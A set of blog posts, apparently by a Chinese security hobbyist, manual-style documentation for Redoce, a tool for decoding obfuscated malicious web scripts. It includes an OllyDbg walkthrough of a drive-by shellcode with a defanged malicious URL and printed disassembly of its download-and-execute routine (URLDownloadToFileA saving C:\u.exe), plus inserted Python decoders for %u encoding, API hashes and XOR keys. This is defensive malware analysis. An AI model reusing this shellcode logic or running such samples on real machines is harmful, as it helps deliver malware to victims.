Welcome to CHENOE's Weblog!
Jun 1
Redoce user guide (Chinese version)
Redoce manual, part 1: What is Redoce
Redoce manual, part 2: Preparation
Redoce manual, part 3: Starting to decode
Redoce manual, part 4: Setting up the program
Redoce manual, part 5: Into the program (1)
Redoce manual, part 6: Into the program (2)
Redoce manual, part 7: Into the program (3)
Redoce manual, part 8: Debugging ShellCode
For more about Redoce, please see my blog: Safelab.spaces.live.com
Redoce guidebook (English version)
Guidebook - Chapter I - 'What is Redoce?'
Guidebook - Chapter II - 'Time to begin'
Guidebook - Chapter III - 'First tour to Mal-www'
Guidebook - Chapter IV - 'Setting Redoce'
Guidebook - Chapter V - 'Advancing (I)'
Guidebook - Chapter VI - 'Advancing (II)'
Guidebook - Chapter VII - 'Advancing (III)'
Guidebook - Chapter VIII - 'Debugging'
For more about Redoce, please visit my blog: Safelab.spaces.live.com
Jun 1
If you have been reading my articles from the first one, you will already know what 'shellcode' means, I think. If you really don't understand what it is, it is recommended that you look back at it here:
http://www.chenoe.com/blog/read.php?14
So, how can I know that this shellcode will download something from somewhere, or, more exactly, what it did? Here we need to debug the shellcode. Shellcode is a part of an executable; you can think of it like that. If so, what it does must be knowable by us clever people :) (my ego was increasing... just a joke, let's continue). Then, the old question: how?
1. Start Redoce.
2. Read the malicious site hxxp://www0.ibds3.cn/ccbf.css, or whichever other one you want to debug (but please remember to check that the shellcode is shown to you completely and not split across many .js files), select YT, right-click, then choose 'replace to %u'; then we get a part of the shellcode like this:
What's this stack of numbers!? Some experienced 'players' (yes, we are just players) may begin reading the code: EB, emm, that stands for 'jmp ...'. Now, no need to trouble ourselves so much; give this heavy translation work to the debugger (although it's a financial crisis, debuggers must get their jobs done; what a bummer if the debugger went on strike!). Move your hand, or, more exactly, your mouse: Functions - Execute - 9>Shellcode to Exe, or just type 9 and click [Begin].
Copy the shellcode into the upper textbox, like this:
Then click [Delete invaild chars], followed by [2 bytes xchg] (because they are %u values, the high byte needs to be exchanged with the low byte), and finally [Generat EXE file]; you will see an exe now standing (or... lying...?) at the place you typed.
Then we start OllyDbg, 'the best ring-3 debugger', as its ads say. You don't need to know much beyond these:
1. F8: Step over, executes one piece of code; it treats everything inside a 'call' as 'one' piece of code too, so it runs all of it at once.
2. F7: Step into, similar to F8, but it treats a 'call' as consisting of many instructions and will step into the 'call'.
3. F2: Set breakpoint; a bp tells the debugger where to pause.
4. F9: Run; you need to let F9 cooperate with F2.
5. F4: Bp and Run, another form of F2+F9.
6. jmp: jump unconditionally
7. je/jz: jump if zero; jne/jnz: jump if not zero
8. nop (0x90): = xchg eax,eax; this instruction does nothing. This is something I needed to add after some people asked me.
After the program is loaded, we are paused at 405000:
00405000 > /EB 54 jmp short 00405056
00405002 |8B75 3C mov esi, dword ptr [ebp+3C]
00405005 |8B7435 78 mov esi, dword ptr [ebp+esi+78]
Emm, a jmp. F8, let's jump together. Where? 405056, xor eax,eax? That zeroes the eax register; ignore it, because we all have one original purpose: find the URL. So let's go deeper into this program:
00405056 33C0 xor eax, eax
00405058 64:0340 30 add eax, dword ptr fs:[eax+30]
0040505C 78 0C js short 0040506A
0040505E 8B40 0C mov eax, dword ptr [eax+C]
00405061 8B70 1C mov esi, dword ptr [eax+1C]
00405064 AD lods dword ptr [esi]
00405065 8B40 08 mov eax, dword ptr [eax+8]
We are coming to call 405002. Please notice that here you are DEBUGGING A DANGEROUS, MALICIOUS SHELLCODE; you need to watch whether it will connect to the internet and download a bomb onto your computer. If it will, be careful: don't casually press F8. If you did, then game over; you now need to repair your computer instead of debugging (of course, it's better to debug it in Sandboxie or a VM, which will not bring damage to your real system).
Press [Enter] to follow it and see its instructions; there are no further calls in there, so click [C] in OllyDbg to return.
00405074 BF 8E4E0EEC mov edi, EC0E4E8E
00405079 E8 84FFFFFF call 00405002
0040507E 83EC 04 sub esp, 4
Then we arrive at the next one, call eax. OD tells us that eax refers to LoadLibraryA, so the program here is calling LoadLibraryA, which lets a program load a DLL into its memory space. Often a GetProcAddress follows. F8, let's step over; I bet you don't want to know in depth how LoadLibraryA works, because that isn't our purpose.
00405085 FFD0 call eax ; kernel32.LoadLibraryA
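As an added example (not Redoce's code, nor the author's), the two preparation steps and the hash lookup in Python: it turns the %u text into bytes the way [Delete invaild chars] and [2 bytes xchg] do, then resolves the constant loaded into edi before each call 00405002. The resolver is assumed to use the ROR-13 hash from Skape's 'Understanding Windows Shellcode', which reproduces the EC0E4E8E that OllyDbg labelled LoadLibraryA; the %u sample inside is a constructed fragment, not runnable shellcode.

```python
"""Redoce's 'Shellcode to Exe' preparation (delete invalid chars, 2-byte xchg) and
the hash lookup OllyDbg did for us when it labelled EC0E4E8E as LoadLibraryA."""
import re
import struct


def unicode_escape_to_bytes(text: str) -> bytes:
    """Decode %uXXXX (and plain %XX) escapes into the byte order the CPU executes.

    %uABCD is one UTF-16LE code unit, so it lands in memory as CD AB: that swap
    is the "2 bytes xchg" button.  Everything that is not an escape (quotes,
    plus signs, line breaks) is skipped, like "Delete invalid chars".
    """
    out = bytearray()
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", text):
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def ror13_hash(name: str) -> int:
    """h = ror(h, 13) + c over the ASCII name, no terminator (Skape's hash, assumed)."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


# Names a download-and-execute shellcode usually needs; extend as required.
KNOWN_APIS = ["LoadLibraryA", "GetProcAddress", "WinExec", "ExitProcess",
              "ExitThread", "URLDownloadToFileA"]
HASH_TABLE = {ror13_hash(n): n for n in KNOWN_APIS}


def find_api_hashes(code: bytes):
    """Find 'BF imm32' (mov edi, imm32) immediately followed by 'E8 rel32' (call),
    the pattern in front of every call 00405002 above, and name each hash."""
    hits = []
    for i in range(len(code) - 9):
        if code[i] == 0xBF and code[i + 5] == 0xE8:
            h = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((i, h, HASH_TABLE.get(h, "unknown")))
    return hits


# Constructed sample: two "mov edi, imm32 / call" stubs in %u form, with NOPs
# around them.  It is a fragment for the scanner, not runnable shellcode.
SAMPLE = "%u9090%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%u90D0%u7EBF%uE2D8%uE873%uFF40%uFFFF"

if __name__ == "__main__":
    code = unicode_escape_to_bytes(SAMPLE)
    print(code.hex(" "))
    for off, h, name in find_api_hashes(code):
        print("offset %d: mov edi, %08X -> %s" % (off, h, name))
```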
Somewhere further on, a jmp brings eip to 4050C5. Please notice that here call 4050A1 targets a previous address. Raise your head, oh no, raise your cursor: it's 'push ebx' followed by a call eax, so we need to F7, step into, to see what trick it's doing.
0040509F /EB 24 jmp short 004050C5
004050A1 |53 push ebx
004050A2 |FFD0 call eax
004050A4 |5D pop ebp
004050A5 |BF 98FE8A0E mov edi, 0E8AFE98
004050AA |E8 53FFFFFF call 00405002
004050AF |83EC 04 sub esp, 4
004050B2 |832C24 62 sub dword ptr [esp], 62
004050B6 |FFD0 call eax
004050B8 |BF 7ED8E273 mov edi, 73E2D87E
004050BD |E8 40FFFFFF call 00405002
004050C2 |52 push edx
004050C3 |FFD0 call eax
004050C5 \E8 D7FFFFFF call 004050A1
It is using URLDownloadToFileA (from urlmon.dll) in a hurry. This function allows a program to connect to the internet and download a file to a local drive, so in a trojan, URLDownloadToFile(A/W) and URLDownloadToCacheFile(A/W) deserve your special attention!
004050A1 53 push ebx
004050A2 FFD0 call eax ; urlmon.URLDownloadToFileA
004050A4 5D pop ebp
F7, step into, and we can see that here it is pushing the first parameter of URLDownloadToFileA; in other words, it is telling the system where from, what, and how it will download. We can clearly see it pushed C:\u.exe (the 3rd parameter of URLDownloadToFileA, the path to save to). If you are interested, you can step into URLDownloadToFileA, and you will find that it converts the ANSI chars to Unicode and then calls URLDownloadToFileW. Of course, this is something for some days (or months?) later; after all, this article tells you how to debug a shellcode in a simple way, not how to analyse the program :). Maybe you should read some professional books rather than listen to the jokes of me, a newbie in this area :).
421379A4 8B5D 10 mov ebx, dword ptr [ebp+10]
421379A7 56 push esi
421379A8 8B75 0C mov esi, dword ptr [ebp+C] ; MyOutPut.004050CA
421379AB 57 push edi
So, that ends our article.
Jun 1
[Calculate] [List]
The items listed here are all bit-calculating functions; you need to fill the param box with the correct parameter before using them.
Then, how can I make my experience simpler?
Yes, of course, you can:
1. Double-click the URL list and the program will load it automatically.
2. Click the button [P] and the program will automatically try to decode the current page.
3. Select a part of the code and click the button [C]; the program will keep only the selected part in the textbox, which makes processing faster.
4. When there is a hxxp in the URL box, no need to modify it; the program will correct it to http.
5. Double-click the step box and it will be emptied.
Please give some introduction to the seldom-used functions.
OK. Frequently used functions are placed where your mouse can reach them easily :), and the others are such as the [+] button, which forces adding a URL to the URL listbox, and the [M] button, which pops up a batch auto-decode window that lets you use the auto-decode function on many URLs without clicking the button one by one. The program also has three buffer textboxes; if you did something wrong, you can click the [1+] and [1-] buttons to reset what you've done.
How fast will you, lazy man, update it?
Not sure. If the program itself can adapt to what you need, or no bugs are found, the program will not get new functions.
How do I report a problem to you?
You can click the link [Report], fill in the data you want to report and click [Submit]; then I'll know.
Also, you can contact me at 597432784#qq.com [replace # with @].
That's all. For some advanced actions such as debugging, please check: Guidebook - Chapter VIII - 'Debugging'
Jun 1
Let's go on.
[Deobfuscation] [List]
[1>Remove quotation marks] This will remove both " and ' in the whole code area.
[2>Remove "\"] This will remove all \ in the code area.
[3>Connect(Remove "+")] This will replace multiple spaces with a single space; also "+", " + ", '+' and ' + ' will be removed.
[4>Customized Replacing] You can tell Redoce what to replace and what to replace it with.
[5>JS Format(;)] This will append line breaks and tabs after ;, { and }.
[6>VBS Format(:)] This will append line breaks and tabs after :.
[7>Connect lines] This will remove all line breaks.
[Execute] [List]
[1>Execute VBS[with Sub Main]] This allows you to execute VBScript inside Redoce.
Example 1:
dim a,b
a=4
b=6
msgbox cstr(a+b)
Example 2:
sub main()
dim a,b
a=4
b=6
msgbox sum(a,b)
end sub
function sum(a,b)
sum=a+b
end function
[2>Base64 Encrypt] This allows you to encode the data in the code textbox with the Base64 algorithm.
[3>Mark 'Eval'] ~ [7>Continuously marking 'Http'] These let the program mark the specified words in the code area. All of them mark only the first occurrence, except '7'.
[8>Batch Downloading] This allows you to download a 'stack' of files. If a file already exists, the new file is renamed automatically.
[9>ShellCode To Exe] This allows you to create an executable for debugging from a piece of shellcode you already have.
(Attention!!) WARNING: shellcode from malicious sites is usually malicious too; if you execute an executable generated from that malicious code, you might catch a virus unexpectedly. Generated executables are only permitted to be executed in a virtual environment for debugging.
[A>PDF/CWS/Zlib Extractor] This allows you to extract data from the compressed data streams of PDF 1.3, 1.4, 1.5 or any other supported version, from CWS files (compressed SWF), and from Zlib-compressed files.
[B>Characters Searching(Param)] This allows you to search for the strings you specify.
[C>Execute JS with ReturnValue[Include Function and RetVal]] [D>Execute JSEval with ReturnValue[Must be standard format]] These allow you to execute JavaScript inside the program, but they seem to have some problems...
That's all folks; for further information please check: Guidebook - Chapter VII - 'Advancing (III)'
Apr 18
·You told us so much about Settings; now tell us something about what functions the program has!
OK, about 3 articles will be written to tell you the details of the functions.
·Where shall I begin?
The function area.
[Param] [TextBox]
Specify the parameter; many functions marked '(Param/NonParam)' or just '(Param)' need a value filled in here.
[%uX] [Button]
Orders Redoce to guess the XOR key of a shellcode in %uABCD format. Because the generators in China often XOR-encrypt the code and decrypt it while the shellcode runs, we added this function so that we don't need to debug every time we decode.
Known problem: Redoce may 'guess' an XOR key even though there is none.
Known problem: Redoce may guess the wrong XOR key.
What is ShellCode?
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance.
From: http://en.wikipedia.org/wiki/Shellcode
[Decode] [List]
[1>Unescape(\x,\,%)(Param/NonParam)] As its name says, this function restores hex \x, octal \ and hex % escapes to ANSI chars.
Known problem: to improve decoding speed, the program does not convert ANSI to Unicode chars, so if you escape some Unicode characters and then use this function, Redoce will not show you the Unicode chars but some ANSI chars instead. All functions except Base64 decrypt work this way.
[2>Base64 Decode] The program will decode a sequence of chars as if they were encoded with the Base64 algorithm.
What is Base64?
The term Base64 refers to a specific MIME content transfer encoding. It is also used as a generic term for any similar encoding scheme that encodes binary data by treating it numerically and translating it into a base 64 representation. The particular choice of base is due to the history of character set encoding: one can choose a set of 64 characters that is both part of the subset common to most encodings, and also printable. This combination leaves the data unlikely to be modified in transit through systems, such as email, which were traditionally not 8-bit clean.
From: http://en.wikipedia.org/wiki/Base64
[3>Alpha2 Decode] [Special thanks to jimmyleo] The program will decode a sequence of chars as if they were encoded with the Alpha2 algorithm.
[4>USASCII Decode] The program will decode a sequence of chars as if they were encoded as USASCII.
What is USASCII?
See: http://en.wikipedia.org/wiki/USASCII
[5>Unicode Decode(%u,\u)(Param/NonParam)] This restores %u and \u encoded chars to ANSI chars.
[6>Eval() Decode(Beta!)] This will let IE execute the script to get the result of eval.
(Dangerous!) Notice: this may be dangerous when IE executes the code; please make sure there is nothing but eval in the script.
[7>StrReverse] Reverses the string.
[8>HexAscii Decode] This function takes the text in the code area two hex characters at a time and restores it to ANSI chars.
[9> Decode(,)] This restores , encoded chars to ANSI chars.
[A>XOR Key Enumerate] This function enumerates the XOR key.
What is XOR (exclusive or)?
Please visit: http://en.wikipedia.org/wiki/Xor
[B>Collect data in quotation marks] This function gets all text inside "; better set a customized decode method in the right-click menu: -db-d7, which makes the program remove CR and LF chars after collecting.
[C>JS.Encode Decode] This function restores JavaScript.Encode'd chars.
[D>CryptHTML Decode(Beta!)] This will let IE execute the script to get the result of document.write. Also effective on code encoded by HTMLShip.
(Dangerous!) Notice: this may be dangerous when IE executes the code; please make sure there is nothing but document.write in the script.
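As an added example (not Redoce's code), a Python version of the key guess behind the [%uX] button and [A>XOR Key Enumerate]: it tries all 256 single-byte keys on a %u-encoded buffer, scores each decode with a constructed marker list, and reports when the winner does not convincingly beat 'no key at all', which is the wrong-guess problem listed as known above. The sample buffer is constructed inline by XOR-encoding a short, non-executable plaintext so the answer can be checked.

```python
"""Guess the single-byte XOR key of a %uXXXX-encoded shellcode, the way Redoce's
[%uX] button and [A>XOR Key Enumerate] do, and show why the guess can be wrong."""
import re
import struct


def unicode_escape_to_bytes(text: str) -> bytes:
    """%uABCD is a UTF-16LE code unit, so it is stored as CD AB."""
    return b"".join(struct.pack("<H", int(h, 16))
                    for h in re.findall(r"%u([0-9A-Fa-f]{4})", text))


def bytes_to_unicode_escape(data: bytes) -> str:
    """Inverse of the above; pads an odd-length buffer with a zero byte."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%04X" % v for v in struct.unpack("<%dH" % (len(data) // 2), data))


# Byte patterns a decoded Windows download-and-execute shellcode tends to contain:
# the PEB accesses (mov eax, fs:[30h] / add eax, fs:[eax+30h]), DLL and file
# names, and a URL.  A marker hit is worth far more than a stray printable byte.
# This list is a constructed heuristic, not Redoce's actual scoring.
MARKERS = [b"\x64\xA1\x30\x00\x00\x00", b"\x64\x03\x40\x30",
           b"urlmon", b"kernel32", b".dll", b".exe", b"http"]


def plausibility(data: bytes) -> int:
    marker_hits = sum(data.count(m) for m in MARKERS)
    printable = sum(1 for b in data if 0x20 <= b < 0x7F)
    return marker_hits * 20 + printable


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def guess_xor_key(code: bytes):
    """Return (best_key, ranked) where ranked is a list of (score, key), best first.

    Key 0 means "not XOR-encoded at all".  If key 0 wins, or is within a few
    points of the winner, the buffer was probably never encoded; reporting a
    key anyway is exactly the false positive the author lists as a known problem.
    """
    ranked = sorted(((plausibility(xor_bytes(code, k)), k) for k in range(256)),
                    reverse=True)
    return ranked[0][1], ranked


def key_is_convincing(ranked, margin: int = 20) -> bool:
    """True when the best key clearly beats the 'no key' hypothesis."""
    best_score, best_key = ranked[0]
    no_key_score = next(s for s, k in ranked if k == 0)
    return best_key != 0 and best_score - no_key_score >= margin


# Constructed sample: a few decoded-looking bytes (PEB walk prologue, a DLL name,
# a save path and a placeholder URL) XORed with 0x5A and re-encoded as %u text.
# It is NOT executable shellcode.
PLAIN = (b"\x33\xC0\x64\x03\x40\x30\x8B\x40\x0C"
         b"urlmon.dll\x00C:\\u.exe\x00http://example.invalid/x.css\x00")
SAMPLE = bytes_to_unicode_escape(xor_bytes(PLAIN, 0x5A))

if __name__ == "__main__":
    code = unicode_escape_to_bytes(SAMPLE)
    key, ranked = guess_xor_key(code)
    print("best key: 0x%02X  convincing: %s" % (key, key_is_convincing(ranked)))
    print("decoded :", xor_bytes(code, key))
    # The same scorer on an unencoded buffer: key 0 wins, so no key is reported.
    print("plain buffer convincing:", key_is_convincing(guess_xor_key(PLAIN)[1]))
```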
That's all.